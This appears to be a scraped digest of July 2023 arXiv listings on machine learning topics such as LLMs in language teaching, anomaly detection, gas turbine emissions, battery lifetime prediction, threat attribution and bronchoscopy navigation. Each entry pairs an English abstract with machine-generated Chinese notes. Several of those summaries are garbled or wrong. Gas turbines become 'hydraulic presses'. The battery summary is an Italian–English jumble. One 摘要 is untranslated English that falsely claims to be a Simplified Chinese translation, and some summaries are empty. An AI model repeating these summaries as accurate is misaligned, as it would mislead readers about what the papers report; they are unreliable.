methods: 论文考虑了几个研究领域，并讨论了在教育技术中使用生成AI的风险和伦理问题。
results: 研究发现大型语言模型在文本生成方面有所改进，但是在自动评分和语法错误检查方面，大型语言模型独立使用不能超越现有的状态艺术metric。

Abstract
The recent release of very large language models such as PaLM and GPT-4 has made an unprecedented impact in the popular media and public consciousness, giving rise to a mixture of excitement and fear as to their capabilities and potential uses, and shining a light on natural language processing research which had not previously received so much attention. The developments offer great promise for education technology, and in this paper we look specifically at the potential for incorporating large language models in AI-driven language teaching and assessment systems. We consider several research areas and also discuss the risks and ethical considerations surrounding generative AI in education technology for language learners. Overall we find that larger language models offer improvements over previous models in text generation, opening up routes toward content generation which had not previously been plausible. For text generation they must be prompted carefully and their outputs may need to be reshaped before they are ready for use. For automated grading and grammatical error correction, tasks whose progress is checked on well-known benchmarks, early investigations indicate that large language models on their own do not improve on state-of-the-art results according to standard evaluation metrics. For grading it appears that linguistic features established in the literature should still be used for best performance, and for error correction it may be that the models can offer alternative feedback styles which are not measured sensitively with existing methods. In all cases, there is work to be done to experiment with the inclusion of large language models in education technology for language learners, in order to properly understand and report on their capacities and limitations, and to ensure that foreseeable risks such as misinformation and harmful bias are mitigated.

摘要
最近发布的非常大的自然语言处理模型，如PaLM和GPT-4，在流行媒体和公众意识中产生了无前例的影响，引发了诸多人的兴奋和担忧，对其能力和应用领域的潜在影响。这些发展在教育技术方面具有巨大潜力，在这篇论文中，我们专门关注在AI驱动的语言教学和评估系统中可能的应用。我们考虑了多个研究领域，并讨论了生成AI在教育技术中的风险和伦理考虑。总之，更大的语言模型在文本生成方面提供了改进，打开了新的内容生成途径，但是需要谨慎地提供提示，并且输出可能需要重新处理。在自动评分和 grammatical error correction 方面，初步调查表明，大语言模型独立使用不会超越现有的标准评价指标。在评分方面，使用现有的语言特征仍然是最佳选择，而在 error correction 方面，模型可能提供不同的反馈样式，不同于现有方法的敏感度评价。总之，需要进行实验来探索将大语言模型包含在教育技术中的可能性和局限性，以确保预期的风险，如误导和不良偏见，得到控制。

Correlation-aware Spatial-Temporal Graph Learning for Multivariate Time-series Anomaly Detection

paper_url: http://arxiv.org/abs/2307.08390
repo_url: https://github.com/astha-chem/mvts-ano-eval
paper_authors: Yu Zheng, Huan Yee Koh, Ming Jin, Lianhua Chi, Khoa T. Phan, Shirui Pan, Yi-Ping Phoebe Chen, Wei Xiang
for: 本研究旨在提出一种新的多变量时间序列异常检测方法，以解决现有方法中的非线性关系捕捉和时间序列异常检测问题。
methods: 本方法基于多变量时间序列相关学习模块，并采用空间时间图学习网络（STGNN）来编码复杂的变量间相关性。另外，通过借鉴一元和多元邻居信息，我们的STGNN组件可以吸收复杂的空间信息。同时，我们还提出了一种新的异常分数组件，可以在无监督情况下估计异常程度。
results: 实验结果表明，CST-GL方法可以在一般情况下有效地检测异常，并且可以在不同的时间延迟下进行早期检测。

Abstract
Multivariate time-series anomaly detection is critically important in many applications, including retail, transportation, power grid, and water treatment plants. Existing approaches for this problem mostly employ either statistical models which cannot capture the non-linear relations well or conventional deep learning models (e.g., CNN and LSTM) that do not explicitly learn the pairwise correlations among variables. To overcome these limitations, we propose a novel method, correlation-aware spatial-temporal graph learning (termed CST-GL), for time series anomaly detection. CST-GL explicitly captures the pairwise correlations via a multivariate time series correlation learning module based on which a spatial-temporal graph neural network (STGNN) can be developed. Then, by employing a graph convolution network that exploits one- and multi-hop neighbor information, our STGNN component can encode rich spatial information from complex pairwise dependencies between variables. With a temporal module that consists of dilated convolutional functions, the STGNN can further capture long-range dependence over time. A novel anomaly scoring component is further integrated into CST-GL to estimate the degree of an anomaly in a purely unsupervised manner. Experimental results demonstrate that CST-GL can detect anomalies effectively in general settings as well as enable early detection across different time delays.

摘要
多变量时间序列异常检测在许多应用程序中非常重要，包括零售、交通、电力网络和水处理厂。现有的方法通常使用统计模型，这些模型不能很好地捕捉非线性关系，或者使用传统的深度学习模型（如CNN和LSTM），这些模型不直接学习时间序列变量之间的对比关系。为了解决这些限制，我们提出了一种新的方法，即相关意识空间时间图学习（CST-GL），用于时间序列异常检测。CST-GL使用多变量时间序列相关学习模块，该模块可以识别时间序列变量之间的对比关系。然后，通过基于这些相关关系的空间时间图 neural network（STGNN）的开发，我们可以融合复杂的对比关系信息，以获得rich的空间信息。此外，我们还使用一个包含扩展延迟 convolutional functions的时间模块，以捕捉长距离时间关系。最后，我们还添加了一个异常分数组件，以无监督的方式估算异常的程度。实验结果表明，CST-GL可以有效地检测异常情况，并且可以在不同的时间延迟下进行早期检测。

Tabular Machine Learning Methods for Predicting Gas Turbine Emissions

paper_url: http://arxiv.org/abs/2307.08386
repo_url: None
paper_authors: Rebecca Potts, Rick Hackney, Georgios Leontidis
for: 这个研究旨在评估机器学习模型在预测液压机发动机排放气体中的性能。
methods: 我们比较了一个现有的预测排放模型（化学动力学模型）和我们基于SAINT和XGBoost的两种机器学习模型，以示机器学习技术可以提供更好的预测性能。
results: 我们发现，使用机器学习技术可以提高氮氧化物（NOx）和碳 моно氧化物（CO）的预测性能。

Abstract
Predicting emissions for gas turbines is critical for monitoring harmful pollutants being released into the atmosphere. In this study, we evaluate the performance of machine learning models for predicting emissions for gas turbines. We compare an existing predictive emissions model, a first principles-based Chemical Kinetics model, against two machine learning models we developed based on SAINT and XGBoost, to demonstrate improved predictive performance of nitrogen oxides (NOx) and carbon monoxide (CO) using machine learning techniques. Our analysis utilises a Siemens Energy gas turbine test bed tabular dataset to train and validate the machine learning models. Additionally, we explore the trade-off between incorporating more features to enhance the model complexity, and the resulting presence of increased missing values in the dataset.

摘要
预测液压机排放是监测污染物排入大气中的关键。本研究对机器学习模型的表现进行评估，以证明使用机器学习技术可以改善液压机排放氮氧化物和碳 моно氧化物的预测性能。我们比较了现有的预测排放模型、基于化学动力学的首要原理模型，与我们基于SAINT和XGBoost开发的两种机器学习模型，以示出机器学习技术的改善性。我们的分析使用了Siemens Energy液压机测试床数据集来训练和验证机器学习模型。此外，我们还探讨了增加特征以增强模型复杂性所带来的数据缺失问题。

Predicting Battery Lifetime Under Varying Usage Conditions from Early Aging Data

paper_url: http://arxiv.org/abs/2307.08382
repo_url: None
paper_authors: Tingkai Li, Zihao Zhou, Adam Thelen, David Howey, Chao Hu
For: 预测 Lithium-ion 电池寿命，以便预防维护、赔偿和改进电池设计和生产。* Methods: 利用 early-life 数据（例如容量-电压数据） derivate 新的特征，以预测 cells 在不同充放速度、放电速度和充放深度下的寿命。* Results: 使用新生成的数据集（来自 225 个 nickel-manganese-cobalt/graphite Li-ion 电池），实现了准确预测 in-distribution cells 的寿命（15.1% 的 mean absolute percentage error），并且使用 hierarchical Bayesian regression model 可以更好地预测 extrapolation 情况（21.8% 的 mean absolute percentage error）。

Abstract
Accurate battery lifetime prediction is important for preventative maintenance, warranties, and improved cell design and manufacturing. However, manufacturing variability and usage-dependent degradation make life prediction challenging. Here, we investigate new features derived from capacity-voltage data in early life to predict the lifetime of cells cycled under widely varying charge rates, discharge rates, and depths of discharge. Features were extracted from regularly scheduled reference performance tests (i.e., low rate full cycles) during cycling. The early-life features capture a cell's state of health and the rate of change of component-level degradation modes, some of which correlate strongly with cell lifetime. Using a newly generated dataset from 225 nickel-manganese-cobalt/graphite Li-ion cells aged under a wide range of conditions, we demonstrate a lifetime prediction of in-distribution cells with 15.1% mean absolute percentage error using no more than the first 15% of data, for most cells. Further testing using a hierarchical Bayesian regression model shows improved performance on extrapolation, achieving 21.8% mean absolute percentage error for out-of-distribution cells. Our approach highlights the importance of using domain knowledge of lithium-ion battery degradation modes to inform feature engineering. Further, we provide the community with a new publicly available battery aging dataset with cells cycled beyond 80% of their rated capacity.

摘要
importante battery lifetime prediction è importante per la manutenzione preventiva, le garanzie e l'improvviso design e produzione di celle. However, la variabilità di produzione e la degradazione dipendenti dall'utilizzo rendono la predizione della vita difficile. Ecco, investigiamo nuove feature derivate dai dati di capacità e tensione in primis dell' vita per predir la durata delle celle ciclate sotto caricate e discariche widely varying. Le feature sono estratte dai test di riferimento regolarmente programmati (ad esempio, cicli full low rate) durante il ciclo. Le feature early-life capture lo stato di salute della cella e il tasso di cambiamento dei modi di degradazione dei componenti, alcuni dei quali correlano strettamente con la durata della cella. Utilizzando un nuovo dataset generato da 225 celle nickel-manganese-cobalt/graphite Li-ion aged under a wide range of conditions, dimostriamo una predizione di vita di cellule in-distribution con un errore assoluto del 15,1% using no more than the first 15% of data, per la maggior parte delle celle. Further testing using a hierarchical Bayesian regression model shows improved performance on extrapolation, achieving 21,8% errore assoluto percentage per le cellule out-of-distribution. Our approach highlights the importance of using domain knowledge of lithium-ion battery degradation modes to inform feature engineering. Further, we provide the community with a new publicly available battery aging dataset with cells cycled beyond 80% of their rated capacity.

Q(D)O-ES: Population-based Quality (Diversity) Optimisation for Post Hoc Ensemble Selection in AutoML

paper_url: http://arxiv.org/abs/2307.08364
repo_url: https://github.com/LennartPurucker/PopulationBasedQDO-PostHocEnsembleSelectionAutoML
paper_authors: Lennart Purucker, Lennart Schneider, Marie Anastacio, Joeran Beel, Bernd Bischl, Holger Hoos
for: 提高预测性能（Post hoc ensemble learning）
methods: 引入两种新的人口基于 ensemble selection方法（QO-ES和QDO-ES），比较GES
results: 在71个分类数据集上测试，QO-ES和QDO-ES常常超过GES，但只有在验证数据上 statistically significant，并且发现多样性可以优化后期ensemble，但也增加预测风险。

Abstract
Automated machine learning (AutoML) systems commonly ensemble models post hoc to improve predictive performance, typically via greedy ensemble selection (GES). However, we believe that GES may not always be optimal, as it performs a simple deterministic greedy search. In this work, we introduce two novel population-based ensemble selection methods, QO-ES and QDO-ES, and compare them to GES. While QO-ES optimises solely for predictive performance, QDO-ES also considers the diversity of ensembles within the population, maintaining a diverse set of well-performing ensembles during optimisation based on ideas of quality diversity optimisation. The methods are evaluated using 71 classification datasets from the AutoML benchmark, demonstrating that QO-ES and QDO-ES often outrank GES, albeit only statistically significant on validation data. Our results further suggest that diversity can be beneficial for post hoc ensembling but also increases the risk of overfitting.

摘要
自动机器学习（AutoML）系统通常会 ensemble 模型后增进预测性能，通常透过单调式排序（GES）。但我们认为 GES 可能不是最佳，因为它只是一个简单决策的排序。在这个工作中，我们引入了两种新的人口基于的ensemble选择方法，QO-ES 和 QDO-ES，并与 GES 进行比较。而 QO-ES 则优化仅对预测性能，而 QDO-ES 则考虑ensemble population 中的多样性，保持一个多样的集合 ensemble 的多样性在依据质量多样化优化。这些方法在 AutoML benchmark 中的 71 个分类 datasets 上进行评估，结果显示 QO-ES 和 QDO-ES 通常比 GES 高，但仅在验证数据上 statistically significant。我们的结果还表明了多样性可以帮助后续的ensemble，但也增加了过滤的风险。

Universal Online Learning with Gradual Variations: A Multi-layer Online Ensemble Approach

paper_url: http://arxiv.org/abs/2307.08360
repo_url: None
paper_authors: Yu-Hu Yan, Peng Zhao, Zhi-Hua Zhou
for: 这个论文是为了提出一种在线 convex optimization 方法，该方法可以在不同级别上适应不同类型和凹度的损失函数。
methods: 该方法基于一种多层在线 ensemble，包括新的优势函数和层次误差 correction。
results: 该方法可以获得 $\mathcal{O}(\ln V_T)$, $\mathcal{O}(d \ln V_T)$ 和 $\hat{\mathcal{O}(\sqrt{V_T})$ 的 regret bounds，其中 $d$ 是维度、$V_T$ 是问题依赖于的梯度变化。此外，该方法还有广泛的应用和意义，包括保证最坏情况下的 guarantees，直接从分析中提取小损 bounds，以及与对抗/随机 convex optimization 和游戏理论的深刻连接。

Abstract
In this paper, we propose an online convex optimization method with two different levels of adaptivity. On a higher level, our method is agnostic to the specific type and curvature of the loss functions, while at a lower level, it can exploit the niceness of the environments and attain problem-dependent guarantees. To be specific, we obtain $\mathcal{O}(\ln V_T)$, $\mathcal{O}(d \ln V_T)$ and $\hat{\mathcal{O}(\sqrt{V_T})$ regret bounds for strongly convex, exp-concave and convex loss functions, respectively, where $d$ is the dimension, $V_T$ denotes problem-dependent gradient variations and $\hat{\mathcal{O}(\cdot)$-notation omits logarithmic factors on $V_T$. Our result finds broad implications and applications. It not only safeguards the worst-case guarantees, but also implies the small-loss bounds in analysis directly. Besides, it draws deep connections with adversarial/stochastic convex optimization and game theory, further validating its practical potential. Our method is based on a multi-layer online ensemble incorporating novel ingredients, including carefully-designed optimism for unifying diverse function types and cascaded corrections for algorithmic stability. Remarkably, despite its multi-layer structure, our algorithm necessitates only one gradient query per round, making it favorable when the gradient evaluation is time-consuming. This is facilitated by a novel regret decomposition equipped with customized surrogate losses.

摘要
在这篇论文中，我们提出了一种在线凸优化方法，具有两个不同的水平的适应性。在更高的水平上，我们的方法是对具体类型和曲率的损失函数不偏袋，而在更低的水平上，它可以利用环境的温柔性并实现问题依赖的保证。具体来说，我们获得了$\mathcal{O}(\ln V_T)$, $\mathcal{O}(d \ln V_T)$和$\hat{\mathcal{O}(\sqrt{V_T})$的 regret bound，其中$d$是维度，$V_T$表示问题依赖的梯度变化，$\hat{\mathcal{O}(\cdot)$-notation忽略了$V_T$的对数因子。我们的结果具有广泛的应用和意义。它不仅保证了最坏情况的保证，而且直接从分析中获得了小损失的 bound。此外，它还与反对抗/随机凸优化和游戏理论之间存在深刻的连接，进一步证明其实用性。我们的方法基于一种多层在线ensemble，包括新的优势因子，例如精心设计的乐观性以及随机逻辑的级联 corrections。备注意的是，即使具有多层结构，我们的算法只需要每个回合一次获取梯度，因此在梯度评估是时间耗费的情况下，它是有利的。这是由一种新的 regret decomposition和自定义损失函数帮助实现的。

Zero-th Order Algorithm for Softmax Attention Optimization

paper_url: http://arxiv.org/abs/2307.08352
repo_url: None
paper_authors: Yichuan Deng, Zhihang Li, Sridhar Mahadevan, Zhao Song
for: 本研究旨在提高大型自然语言模型（LLM）的优化技术，特别是在计算梯度时的效率。
methods: 本研究提出了一种针对软max单元的零次顺序算法，通过只进行前向传输来approximately计算梯度。
results: 我们的算法能够高效地计算大规模LLM的梯度，并且可以在不同的语言模型中实现效果。

Abstract
Large language models (LLMs) have brought about significant transformations in human society. Among the crucial computations in LLMs, the softmax unit holds great importance. Its helps the model generating a probability distribution on potential subsequent words or phrases, considering a series of input words. By utilizing this distribution, the model selects the most probable next word or phrase, based on the assigned probabilities. The softmax unit assumes a vital function in LLM training as it facilitates learning from data through the adjustment of neural network weights and biases. With the development of the size of LLMs, computing the gradient becomes expensive. However, Zero-th Order method can approximately compute the gradient with only forward passes. In this paper, we present a Zero-th Order algorithm specifically tailored for Softmax optimization. We demonstrate the convergence of our algorithm, highlighting its effectiveness in efficiently computing gradients for large-scale LLMs. By leveraging the Zeroth-Order method, our work contributes to the advancement of optimization techniques in the context of complex language models.

摘要
With the development of the size of LLMs, computing the gradient becomes expensive. However, the Zero-th Order method can approximately compute the gradient with only forward passes. In this paper, we present a Zero-th Order algorithm specifically tailored for Softmax optimization. We demonstrate the convergence of our algorithm, highlighting its effectiveness in efficiently computing gradients for large-scale LLMs. By leveraging the Zeroth-Order method, our work contributes to the advancement of optimization techniques in the context of complex language models.(Note: The text has been translated into Simplified Chinese, which is the standard writing system used in mainland China. The translation may differ slightly from the traditional Chinese writing system used in Hong Kong and Taiwan.)

M-FLAG: Medical Vision-Language Pre-training with Frozen Language Models and Latent Space Geometry Optimization

paper_url: http://arxiv.org/abs/2307.08347
repo_url: https://github.com/cheliu-computation/m-flag-miccai2023
paper_authors: Che Liu, Sibo Cheng, Chen Chen, Mengyun Qiao, Weitong Zhang, Anand Shah, Wenjia Bai, Rossella Arcucci
for: 这篇研究旨在提出一种新的医疗视力语言模型预训练方法，以提高医疗视力语言模型的训练稳定性和效率。
methods: 提案方法名为M-FLAG，它利用固定的语言模型进行预训练，并引入一个新的正交对映损失来调和视力语言模型的内存空间几何。
results: 实验结果显示，M-FLAG方法可以对医疗视力语言模型进行有效的预训练，并在三个下游任务中表现出色：医疗图像分类、分割和物体检测。尤其是在分割任务中，M-FLAG方法只使用了RSNA数据集的1%，却可以超越已经精心适应的ImageNet预训练模型。

Abstract
Medical vision-language models enable co-learning and integrating features from medical imaging and clinical text. However, these models are not easy to train and the latent representation space can be complex. Here we propose a novel way for pre-training and regularising medical vision-language models. The proposed method, named Medical vision-language pre-training with Frozen language models and Latent spAce Geometry optimization (M-FLAG), leverages a frozen language model for training stability and efficiency and introduces a novel orthogonality loss to harmonize the latent space geometry. We demonstrate the potential of the pre-trained model on three downstream tasks: medical image classification, segmentation, and object detection. Extensive experiments across five public datasets demonstrate that M-FLAG significantly outperforms existing medical vision-language pre-training approaches and reduces the number of parameters by 78\%. Notably, M-FLAG achieves outstanding performance on the segmentation task while using only 1\% of the RSNA dataset, even outperforming ImageNet pre-trained models that have been fine-tuned using 100\% of the data.

摘要
医疗视语模型可以同时学习医疗影像和临床文本特征。然而，这些模型不易于训练，其潜在表示空间可能很复杂。在这里，我们提出了一种新的医疗视语预训练方法，名为医疗视语预训练with Frozen language models和Latent spAce Geometry optimization（M-FLAG）。我们利用一个冻结的语言模型来保持训练稳定和高效，并引入了一种新的正交准则来融和潜在空间准则。我们在三个下游任务中展示了预训练模型的潜力：医疗影像分类、 segmentation 和对象检测。我们在五个公共数据集进行了广泛的实验，并证明了M-FLAG在现有的医疗视语预训练方法中显著超越，并将参数数量减少了78%。特别是，M-FLAG在分割任务上表现出色，只使用了RSNA数据集的1%，甚至超过了ImageNet预训练模型，这些模型在100%的数据上进行了精细调节。

Efficient selective attention LSTM for well log curve synthesis

paper_url: http://arxiv.org/abs/2307.10253
repo_url: None
paper_authors: Yuankai Zhou, Huanyu Li, Hu liu
for: 这 paper 是为了提出一种机器学习方法，用于预测缺失的井 logging 曲线。
methods: 该方法基于传统的 Long Short-Term Memory (LSTM) 神经网络，并添加了一个自注意机制来分析数据的空间相关性。
results: 实验结果表明，该方法可以高效地预测缺失的井 logging 曲线，并且比传统的 Fully Connected Neural Networks (FCNN) 和 LSTM 方法更高精度。

Abstract
Non-core drilling has gradually become the primary exploration method in geological engineering, and well logging curves have increasingly gained importance as the main carriers of geological information. However, factors such as geological environment, logging equipment, borehole quality, and unexpected events can all impact the quality of well logging curves. Previous methods of re-logging or manual corrections have been associated with high costs and low efficiency. This paper proposes a machine learning method that utilizes existing data to predict missing well logging curves, and its effectiveness and feasibility have been validated through experiments. The proposed method builds upon the traditional Long Short-Term Memory (LSTM) neural network by incorporating a self-attention mechanism to analyze the spatial dependencies of the data. It selectively includes the dominant computational results in the LSTM, reducing the computational complexity from O(n^2) to O(nlogn) and improving model efficiency. Experimental results demonstrate that the proposed method achieves higher accuracy compared to traditional curve synthesis methods based on Fully Connected Neural Networks (FCNN) and LSTM. This accurate, efficient, and cost-effective prediction method holds practical value in engineering applications.

摘要
非核心钻探逐渐成为地质工程的主要探测方法，而井 logging 曲线也逐渐成为主要的地质信息传递者。然而，地质环境、钻探设备、井井质量和意外事件等因素都会影响井 logging 曲线的质量。过去的重新采样或手动修正方法均具有高成本和低效率。这篇论文提出了一种使用现有数据预测缺失井 logging 曲线的机器学习方法，并通过实验证明其效果和可行性。该方法基于传统的 Long Short-Term Memory (LSTM) 神经网络，并在该网络中添加了自注意机制来分析数据的空间相关性。它选择性地包含 LSTM 中的主导计算结果，从而将计算复杂性从 O(n^2) 降低到 O(nlogn)，提高模型效率。实验结果表明，提议的方法与基于 Fully Connected Neural Networks (FCNN) 和 LSTM 的传统曲线合成方法相比，具有更高的准确率。这种准确、有效、Cost-effective 的预测方法在工程应用中具有实际价值。

Gaussian processes for Bayesian inverse problems associated with linear partial differential equations

paper_url: http://arxiv.org/abs/2307.08343
repo_url: None
paper_authors: Tianming Bai, Aretha L. Teckentrup, Konstantinos C. Zygalakis
for: 该论文关注使用 Gaussian 替身模型解决 bayesian 反问题，特别是只有小量训练数据的情况下。
methods: authors extend Raissi et al. (2017) 的框架，使用 PDE-informed Gaussian 假设来构建不同的approximate posteriors。
results: numerical experiments 表明，使用 PDE-informed Gaussian 假设可以提高模型的性能，比传统假设更好。Here’s the same information in English:
for: The paper focuses on using Gaussian surrogate models for Bayesian inverse problems associated with linear partial differential equations, particularly in the regime where only a small amount of training data is available.
methods: The authors extend the framework of Raissi et al. (2017) to construct PDE-informed Gaussian priors, which are used to construct different approximate posteriors.
results: Numerical experiments demonstrate the superiority of the PDE-informed Gaussian priors over more traditional priors.

Abstract
This work is concerned with the use of Gaussian surrogate models for Bayesian inverse problems associated with linear partial differential equations. A particular focus is on the regime where only a small amount of training data is available. In this regime the type of Gaussian prior used is of critical importance with respect to how well the surrogate model will perform in terms of Bayesian inversion. We extend the framework of Raissi et. al. (2017) to construct PDE-informed Gaussian priors that we then use to construct different approximate posteriors. A number of different numerical experiments illustrate the superiority of the PDE-informed Gaussian priors over more traditional priors.

摘要

RAYEN: Imposition of Hard Convex Constraints on Neural Networks

paper_url: http://arxiv.org/abs/2307.08336
repo_url: https://github.com/leggedrobotics/rayen
paper_authors: Jesus Tordesillas, Jonathan P. How, Marco Hutter
for: 这个论文是用来实现神经网络中的硬 convex 约束的框架，保证任何输入或者神经网络的参数，约束都会被满足。
methods: 这个框架使用了一些新的技术，例如不需要计算量占用的正交投影步骤、不需要软约束（不能保证约束在测试时都会被满足）、不需要保守的近似约束集和不需要慢速的内部梯度下降来保证约束。
results: 使用这个框架，可以很快地（比如1Kquadratic约束在1000维变量上的 overhead低于8ms，300x300稠密矩阵LMI约束在10000维变量上的 overhead低于12ms）进行约束优化问题的解决，而且可以保证约束的满足，计算时间比状态艺术算法快，计算结果几乎与最优解一致。

Abstract
This paper presents RAYEN, a framework to impose hard convex constraints on the output or latent variable of a neural network. RAYEN guarantees that, for any input or any weights of the network, the constraints are satisfied at all times. Compared to other approaches, RAYEN does not perform a computationally-expensive orthogonal projection step onto the feasible set, does not rely on soft constraints (which do not guarantee the satisfaction of the constraints at test time), does not use conservative approximations of the feasible set, and does not perform a potentially slow inner gradient descent correction to enforce the constraints. RAYEN supports any combination of linear, convex quadratic, second-order cone (SOC), and linear matrix inequality (LMI) constraints, achieving a very small computational overhead compared to unconstrained networks. For example, it is able to impose 1K quadratic constraints on a 1K-dimensional variable with an overhead of less than 8 ms, and an LMI constraint with 300x300 dense matrices on a 10K-dimensional variable in less than 12 ms. When used in neural networks that approximate the solution of constrained optimization problems, RAYEN achieves computation times between 20 and 7468 times faster than state-of-the-art algorithms, while guaranteeing the satisfaction of the constraints at all times and obtaining a cost very close to the optimal one.

摘要

A Machine Learning based Empirical Evaluation of Cyber Threat Actors High Level Attack Patterns over Low level Attack Patterns in Attributing Attacks

paper_url: http://arxiv.org/abs/2307.10252
repo_url: None
paper_authors: Umara Noor, Sawera Shahid, Rimsha Kanwal, Zahid Rashid
for:这个论文旨在探讨了Cyber threat attribution的问题，即在网络空间中识别攻击者的过程。methods:这篇论文使用了手动分析攻击 patrerns，包括骗财机制、侵入检测系统、防火墙和trace-back过程，以及高级指标（IOC）和低级指标（IOC）的比较。results:实验结果显示，高级指标（IOC）训练模型可以有95%的准确率地归类攻击，而低级指标（IOC）训练模型的准确率只有40%。

Abstract
Cyber threat attribution is the process of identifying the actor of an attack incident in cyberspace. An accurate and timely threat attribution plays an important role in deterring future attacks by applying appropriate and timely defense mechanisms. Manual analysis of attack patterns gathered by honeypot deployments, intrusion detection systems, firewalls, and via trace-back procedures is still the preferred method of security analysts for cyber threat attribution. Such attack patterns are low-level Indicators of Compromise (IOC). They represent Tactics, Techniques, Procedures (TTP), and software tools used by the adversaries in their campaigns. The adversaries rarely re-use them. They can also be manipulated, resulting in false and unfair attribution. To empirically evaluate and compare the effectiveness of both kinds of IOC, there are two problems that need to be addressed. The first problem is that in recent research works, the ineffectiveness of low-level IOC for cyber threat attribution has been discussed intuitively. An empirical evaluation for the measure of the effectiveness of low-level IOC based on a real-world dataset is missing. The second problem is that the available dataset for high-level IOC has a single instance for each predictive class label that cannot be used directly for training machine learning models. To address these problems in this research work, we empirically evaluate the effectiveness of low-level IOC based on a real-world dataset that is specifically built for comparative analysis with high-level IOC. The experimental results show that the high-level IOC trained models effectively attribute cyberattacks with an accuracy of 95% as compared to the low-level IOC trained models where accuracy is 40%.

摘要
“网络威胁识别是指在网络空间中识别攻击事件的具体执行者。正确和及时的威胁识别对于防止未来攻击提供了重要的防御机制。现今，安全分析师仍然采用手动分析攻击模式，包括骗子部署、入侵检测系统、防火墙等，以及跟踪返回过程，进行威胁识别。这些攻击模式被称为低级别征识（Indicators of Compromise，IOC）。它们表示敌对者在其攻击活动中使用的策略、技术、程序（Tactics, Techniques, Procedures，TTP）和软件工具。敌对者很少重复使用这些攻击模式，它们也可以被修改，导致假的和不公正的威胁识别。为了empirically评估和比较低级别征识和高级别征识的效果，这些问题需要被解决。第一个问题是，在当前的研究中，低级别征识的效果不够有效性已经被直观提出。empirical评估基于实际数据集的低级别征识效果缺失。第二个问题是，可用的高级别征识数据集中每个预测类别的单个实例不能直接用于机器学习模型训练。为解决这些问题，我们在这项研究中Empirically评估了低级别征识的效果，并使用特定 для比较分析的实际数据集。实验结果显示，高级别征识训练模型可以准确地归类攻击事件，准确率达95%，而低级别征识训练模型的准确率只有40%。”

Analyzing the Impact of Adversarial Examples on Explainable Machine Learning

paper_url: http://arxiv.org/abs/2307.08327
repo_url: None
paper_authors: Prathyusha Devabhakthini, Sasmita Parida, Raj Mani Shukla, Suvendu Chandan Nayak
for: 这个论文探讨了深度学习模型对针对性攻击的抵触性。
methods: 作者采用了一种ML基于的文本分类模型，然后引入了针对性攻击来影响模型的分类性能。
results: 研究发现，针对性攻击可以轻松地使模型错误地预测文本。此外，作者还分析了模型的解释性前后针对性攻击，以了解模型在攻击后的性能。

Abstract
Adversarial attacks are a type of attack on machine learning models where an attacker deliberately modifies the inputs to cause the model to make incorrect predictions. Adversarial attacks can have serious consequences, particularly in applications such as autonomous vehicles, medical diagnosis, and security systems. Work on the vulnerability of deep learning models to adversarial attacks has shown that it is very easy to make samples that make a model predict things that it doesn't want to. In this work, we analyze the impact of model interpretability due to adversarial attacks on text classification problems. We develop an ML-based classification model for text data. Then, we introduce the adversarial perturbations on the text data to understand the classification performance after the attack. Subsequently, we analyze and interpret the model's explainability before and after the attack

摘要
adversarial 攻击是一种针对机器学习模型的攻击，攻击者故意修改输入，以让模型作出错误预测。 adversarial 攻击可能会有严重的后果，特别是在自动驾驶、医疗诊断和安全系统等应用中。我们在深度学习模型对 adversarial 攻击的抵触性上进行了研究。我们开发了一个基于 ML 的文本数据分类模型，然后引入了对文本数据的 adversarial 偏移，以了解攻击后分类性能。接着，我们分析和解释模型在攻击后的解释性。

A Secure Aggregation for Federated Learning on Long-Tailed Data

paper_url: http://arxiv.org/abs/2307.08324
repo_url: None
paper_authors: Yanna Jiang, Baihe Ma, Xu Wang, Guangsheng Yu, Caijun Sun, Wei Ni, Ren Ping Liu
for: 本研究针对 Federated Learning (FL) 面临的两大挑战：数据分布不均和模型攻击。
methods: 提出了一种新的两层聚合方法，可以拒绝恶意模型和选择值得模型，并具有较好的抗辐射性。
results: 实验表明，思想团（think tank）可以有效地选择模型进行全局聚合。

Abstract
As a distributed learning, Federated Learning (FL) faces two challenges: the unbalanced distribution of training data among participants, and the model attack by Byzantine nodes. In this paper, we consider the long-tailed distribution with the presence of Byzantine nodes in the FL scenario. A novel two-layer aggregation method is proposed for the rejection of malicious models and the advisable selection of valuable models containing tail class data information. We introduce the concept of think tank to leverage the wisdom of all participants. Preliminary experiments validate that the think tank can make effective model selections for global aggregation.

摘要
作为分布式学习的一种形式， federated learning (FL) 面临两大挑战：训练数据在参与者中的不均匀分布，以及由拜占庭节点引起的模型攻击。在这篇论文中，我们考虑了在 FL 场景中存在长板分布和拜占庭节点的情况下的长板分布。我们提出了一种新的两层聚合方法，用于拒绝恶意模型和选择值得采用的模型，并具有拥有尾类数据信息。我们引入了“思想库”的概念，以利用所有参与者的智慧。初步实验表明，思想库可以做到有效地选择模型进行全球聚合。

Airway Label Prediction in Video Bronchoscopy: Capturing Temporal Dependencies Utilizing Anatomical Knowledge

paper_url: http://arxiv.org/abs/2307.08318
repo_url: None
paper_authors: Ron Keuth, Mattias Heinrich, Martin Eichenlaub, Marian Himstedt
For: This paper provides a novel approach for navigation guidance during bronchoscopy interventions without the need for electromagnetic tracking or patient-specific CT scans.* Methods: The proposed approach uses topological bronchoscope localization and incorporates sequences of CNN-based airway likelihoods into a Hidden Markov Model, leveraging anatomical constraints and temporal context for improved accuracy.* Results: The approach is evaluated in a lung phantom model and achieves an accuracy of up to 0.98 compared to 0.81 for a classification based on individual frames, demonstrating the effectiveness of the proposed method.

Abstract
Purpose: Navigation guidance is a key requirement for a multitude of lung interventions using video bronchoscopy. State-of-the-art solutions focus on lung biopsies using electromagnetic tracking and intraoperative image registration w.r.t. preoperative CT scans for guidance. The requirement of patient-specific CT scans hampers the utilisation of navigation guidance for other applications such as intensive care units. Methods: This paper addresses navigation guidance solely incorporating bronchosopy video data. In contrast to state-of-the-art approaches we entirely omit the use of electromagnetic tracking and patient-specific CT scans. Guidance is enabled by means of topological bronchoscope localization w.r.t. an interpatient airway model. Particularly, we take maximally advantage of anatomical constraints of airway trees being sequentially traversed. This is realized by incorporating sequences of CNN-based airway likelihoods into a Hidden Markov Model. Results: Our approach is evaluated based on multiple experiments inside a lung phantom model. With the consideration of temporal context and use of anatomical knowledge for regularization, we are able to improve the accuracy up to to 0.98 compared to 0.81 (weighted F1: 0.98 compared to 0.81) for a classification based on individual frames. Conclusion: We combine CNN-based single image classification of airway segments with anatomical constraints and temporal HMM-based inference for the first time. Our approach renders vision-only guidance for bronchoscopy interventions in the absence of electromagnetic tracking and patient-specific CT scans possible.

摘要
